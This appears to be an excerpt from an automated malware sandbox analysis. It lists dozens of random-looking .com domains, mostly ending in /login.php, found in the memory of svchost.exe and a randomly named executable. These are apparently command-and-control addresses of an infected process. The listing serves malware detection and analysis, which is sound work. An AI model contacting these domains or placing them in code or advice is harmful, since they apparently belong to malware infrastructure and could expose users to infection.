Source: svchost.exe, 00000002.00000003.2726510414.00000000092B6000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2360502034.00000000092C1000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2760150538.00000000092E4000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2746470521.00000000092B7000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2358968663.00000000092C1000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2358089375.00000000092C8000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2363422290.00000000092C2000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2359102012.00000000092C1000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2363692365.00000000092C2000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2362592176.00000000092C1000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://qetyqag.com/login.php
Source: svchost.exe, 00000002.00000003.2666875773.00000000040F6000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2667617957.0000000000853000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2672508299.00000000092B6000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2667608142.00000000040FD000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2667040821.00000000040FB000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://qetyrul.com/login.php
Source: svchost.exe, 00000002.00000003.2346403174.00000000092BD000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2346603921.00000000092BD000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2667617957.0000000000853000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2649350353.0000000000853000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2647496494.00000000040F3000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2356885542.00000000092C6000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2346691543.00000000092BE000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2356000937.00000000092BE000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2349309789.00000000092C7000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://qetytav.com/login.php
Source: svchost.exe, 00000002.00000002.3428370692.00000000092EB000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2919185604.00000000092E4000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2379463124.00000000092B6000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2380581815.00000000092B6000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.3287645590.00000000092EA000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2913582701.00000000092B6000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2908725007.00000000040FB000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2905696441.00000000092E4000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000002.3421967691.00000000040FF000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000002.3426788667.0000000009235000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://qetytup.com/login.php
Source: svchost.exe, 00000002.00000003.2612263098.00000000040F6000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2578250611.00000000040F0000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2585897260.00000000040F5000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://qetyvil.com/H
Source: svchost.exe, 00000002.00000003.2612263098.00000000040F6000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2585897260.00000000040F5000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://qetyvil.com/yvLMEM
Source: svchost.exe, 00000002.00000003.2498726255.000000000085D000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://qexyfel.com/
Source: svchost.exe, 00000002.00000003.2509683984.0000000003368000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2311968303.00000000092B6000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2527939785.0000000003368000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2523187509.0000000003363000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2310767470.00000000092B6000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2512099666.0000000003360000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2506997946.0000000003363000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://qexyfel.com/login.php
Source: svchost.exe, 00000002.00000003.2678962210.00000000092E5000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2693258532.00000000040FD000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2672508299.00000000092B6000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2667608142.00000000040FD000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2667583572.00000000092E5000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2665259102.00000000092E4000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2356885542.00000000092C6000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2667040821.00000000040FB000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2356000937.00000000092BE000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://qexyfuq.com/login.php
Source: svchost.exe, 00000002.00000003.2667584330.00000000040F6000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2666875773.00000000040F6000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://qexyfuq.com/pg
Source: svchost.exe, 00000002.00000003.2346403174.00000000092BD000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2346603921.00000000092BD000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2657780583.00000000092B6000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2649350353.0000000000853000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2356885542.00000000092C6000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2346691543.00000000092BE000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2356000937.00000000092BE000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2349309789.00000000092C7000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://qexyhap.com/login.php
Source: svchost.exe, 00000002.00000003.2376137841.00000000092B6000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2879404289.00000000092B6000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2925665962.00000000092B6000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2902106768.00000000040FB000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2376002854.000000000923B000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2928746848.00000000092B7000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2896263867.0000000000854000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2913582701.00000000092B6000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2884058737.00000000092E4000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000002.3427876534.00000000092B8000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://qexykav.com/login.php
Source: svchost.exe, 00000002.00000003.2397665900.00000000092E5000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2197741050.00000000008A3000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2425745567.00000000092E4000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2422762232.00000000092E3000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2178331950.00000000008A3000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2197653218.0000000009298000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2185076169.00000000033EF000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2388042380.00000000092C0000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2202867008.0000000009299000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2387081098.00000000092B6000.00000004.00000020.00020000.00000000.sdmp, PMnAVsjMPucERAKEWNFImySCFHoLk.exe, 00000006.00000002.2622033644.0000000008E90000.00000004.00000001.00020000.00000000.sdmp, PMnAVsjMPucERAKEWNFImySCFHoLk.exe, 00000007.00000002.2744689381.0000000009396000.00000004.00000001.00020000.00000000.sdmp, PMnAVsjMPucERAKEWNFImySCFHoLk.exe, 00000007.00000002.2613849314.0000000000F68000.00000004.00000020.00020000.00000000.sdmp, PMnAVsjMPucERAKEWNFImySCFHoLk.exe, 00000009.00000002.2671362092.00000000086C1000.00000004.00000001.00020000.00000000.sdmp, PMnAVsjMPucERAKEWNFImySCFHoLk.exe, 00000009.00000002.2608350004.0000000000802000.00000004.00000020.00020000.00000000.sdmp, PMnAVsjMPucERAKEWNFImySCFHoLk.exe, 0000000B.00000002.2745540362.00000000093CD000.00000004.00000001.00020000.00000000.sdmp, PMnAVsjMPucERAKEWNFImySCFHoLk.exe, 00000013.00000002.2640207678.0000000001363000.00000004.00000020.00020000.00000000.sdmp, PMnAVsjMPucERAKEWNFImySCFHoLk.exe, 
00000015.00000002.2856769526.0000000008FC3000.00000004.00000001.00020000.00000000.sdmp, PMnAVsjMPucERAKEWNFImySCFHoLk.exe, 00000015.00000002.2676238100.00000000010BA000.00000004.00000020.00020000.00000000.sdmp, PMnAVsjMPucERAKEWNFImySCFHoLk.exe, 00000015.00000002.2875818807.00000000091FC000.00000004.00000001.00020000.00000000.sdmp, PMnAVsjMPucERAKEWNFImySCFHoLk.exe, 00000018.00000002.2901602167.0000000008BD5000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://qexylup.com/login.php
Source: svchost.exe, 00000002.00000003.2649333466.00000000092E4000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2346603921.00000000092BD000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2356885542.00000000092C6000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2346691543.00000000092BE000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2356000937.00000000092BE000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2349309789.00000000092C7000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://qexynol.com/login.php
Source: svchost.exe, 00000002.00000003.2376137841.00000000092B6000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2902106768.00000000040FB000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://qexyqip.com/login.php
Source: svchost.exe, 00000002.00000003.2337886081.00000000092C7000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2337365737.0000000003363000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2337520424.0000000003368000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2337007716.00000000092BC000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2337073481.0000000003360000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2336882213.00000000092B6000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2335731822.00000000092BC000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2335731822.00000000092B6000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2337007716.00000000092B8000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2336470104.0000000003356000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://qexyriq.com/login.php
Source: svchost.exe, 00000002.00000003.2726510414.00000000092B6000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2729337658.0000000003363000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2360502034.00000000092C1000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2746470521.00000000092B7000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2746888339.0000000000854000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2358968663.00000000092C1000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2358089375.00000000092C8000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2829874698.000000000084D000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2359102012.00000000092C1000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2735954545.0000000003368000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://qexysev.com/login.php
Source: svchost.exe, 00000002.00000003.2513678339.0000000000853000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2310815345.0000000003368000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2311968303.00000000092B6000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2542956129.0000000000853000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2310767470.00000000092B6000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2513019694.0000000000851000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2499635923.0000000000855000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2513835440.00000000092E4000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2499628727.00000000092E4000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://vocybam.com/login.php
Source: svchost.exe, 00000002.00000003.2666875773.00000000040F6000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2846625879.00000000040FF000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2843959514.00000000040FF000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2902106768.00000000040FB000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2809409371.00000000040ED000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2693258532.00000000040FD000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2672508299.00000000092B6000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2667608142.00000000040FD000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2849287050.00000000040FD000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2667040821.00000000040FB000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2908725007.00000000040FB000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000002.3421967691.00000000040FF000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2814428917.00000000040FE000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://vocybuf.com/login.php
Source: svchost.exe, 00000002.00000003.2637865779.00000000092E5000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2337886081.00000000092C7000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2329364841.00000000092BD000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2337007716.00000000092BC000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2327922219.00000000092C0000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2330522610.00000000092C6000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2635608953.00000000092E4000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2335731822.00000000092BC000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2547959760.00000000092E4000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2329969836.0000000003360000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://vocycuc.com/login.php
Source: svchost.exe, 00000002.00000003.2359792353.000000000924A000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2360483972.000000000924A000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://vocydyc.com/http://gahyziw.com/
Source: svchost.exe, 00000002.00000003.2726510414.00000000092B6000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2360502034.00000000092C1000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2760150538.00000000092E4000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2746470521.00000000092B7000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2358968663.00000000092C1000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2358089375.00000000092C8000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2359102012.00000000092C1000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://vocydyc.com/login.php
Source: svchost.exe, 00000002.00000003.2397665900.00000000092E5000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000002.3419128942.000000000336B000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000002.3427392798.0000000009288000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2925665962.00000000092B6000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2425745567.00000000092E4000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2927397659.0000000003363000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000002.3427392798.000000000927C000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2381728153.00000000092E3000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2388806823.0000000003360000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2928746848.00000000092B7000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.3279511546.0000000003369000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000002.3408110880.0000000000855000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2422762232.00000000092E3000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2928459922.0000000003368000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000002.3427876534.00000000092B8000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://vocygef.com/login.php
Source: svchost.exe, 00000002.00000003.2666875773.00000000040F6000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2678962210.00000000092E5000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2667617957.0000000000853000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2693258532.00000000040FD000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2667608142.00000000040FD000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2667583572.00000000092E5000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2665259102.00000000092E4000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2667040821.00000000040FB000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://vocygim.com/login.php
Source: svchost.exe, 00000002.00000003.2346403174.00000000092BD000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2346603921.00000000092BD000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2346961253.0000000003360000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2346691543.00000000092BE000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2349309789.00000000092C7000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://vocyjet.com/login.php
Source: svchost.exe, 00000002.00000003.2649333466.00000000092E4000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2657780583.00000000092B6000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2347333934.0000000000851000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2347614295.0000000000853000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://vocymak.com/login.php
Source: svchost.exe, 00000002.00000003.2289346650.00000000008E5000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2287542216.0000000003330000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2292259372.0000000003332000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2496966130.0000000000851000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2289345179.00000000092B6000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://vocymut.com/login.php
Source: svchost.exe, 00000002.00000003.2337886081.00000000092C7000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2329364841.00000000092BD000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2337007716.00000000092BC000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2329971226.00000000092E4000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2327922219.00000000092C0000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2330522610.00000000092C6000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2335731822.00000000092BC000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2547959760.00000000092E4000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2329969836.0000000003360000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://vocypyt.com/login.php
00000009.00000002.2671362092.00000000086C1000.00000004.00000001.00020000.00000000.sdmp, PMnAVsjMPucERAKEWNFImySCFHoLk.exe, 00000009.00000002.2671362092.0000000008682000.00000004.00000001.00020000.00000000.sdmp, PMnAVsjMPucERAKEWNFImySCFHoLk.exe, 0000000B.00000002.2745540362.00000000093A5000.00000004.00000001.00020000.00000000.sdmp, PMnAVsjMPucERAKEWNFImySCFHoLk.exe, 0000000B.00000002.2745540362.00000000093CD000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://volyqat.com/login.php
Source: svchost.exe, 00000002.00000003.2337886081.00000000092C7000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2337365737.0000000003363000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2337520424.0000000003368000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2337007716.00000000092BC000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2337073481.0000000003360000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2335731822.00000000092BC000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2336470104.0000000003356000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://volyquk.com/login.php
Source: svchost.exe, 00000002.00000003.2329963433.0000000003319000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2328865580.0000000003315000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2329926664.0000000003317000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2546812858.00000000040F5000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2328162774.0000000003315000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://volyrac.com/
Source: svchost.exe, 00000002.00000003.2637865779.00000000092E5000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2337886081.00000000092C7000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2329364841.00000000092BD000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2337007716.00000000092BC000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2330574542.0000000003356000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2329971226.00000000092E4000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2327922219.00000000092C0000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2330522610.00000000092C6000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2635608953.00000000092E4000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2335731822.00000000092BC000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2547959760.00000000092E4000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://volyzef.com/login.php
Source: svchost.exe, 00000002.00000003.2331931532.0000000003331000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2529520220.00000000092B7000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2322986908.000000000332C000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2322419492.00000000092B6000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2314870999.0000000003360000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2313143430.000000000332E000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2322727619.0000000003368000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2322546634.0000000003363000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2521894791.00000000092B6000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2329969836.0000000003360000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2313145262.0000000003329000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2314873415.00000000092B6000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2322755404.00000000092B7000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://vonybat.com/login.php
Source: svchost.exe, 00000002.00000003.2726510414.00000000092B6000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2729337658.0000000003363000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2360502034.00000000092C1000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2879404289.00000000092B6000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2925665962.00000000092B6000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2746470521.00000000092B7000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2358968663.00000000092C1000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2358089375.00000000092C8000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2928746848.00000000092B7000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2913582701.00000000092B6000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2359102012.00000000092C1000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000002.3427876534.00000000092B8000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2735954545.0000000003368000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://vonybuk.com/login.php
Source: svchost.exe, 00000002.00000003.2329963433.0000000003319000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2328865580.0000000003315000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2329926664.0000000003317000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2546812858.00000000040F5000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2328162774.0000000003315000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://vonycum.com/
Source: svchost.exe, 00000002.00000003.2678962210.00000000092E5000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2760150538.00000000092E4000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2667583572.00000000092E5000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2665259102.00000000092E4000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://vonyjef.com/login.php
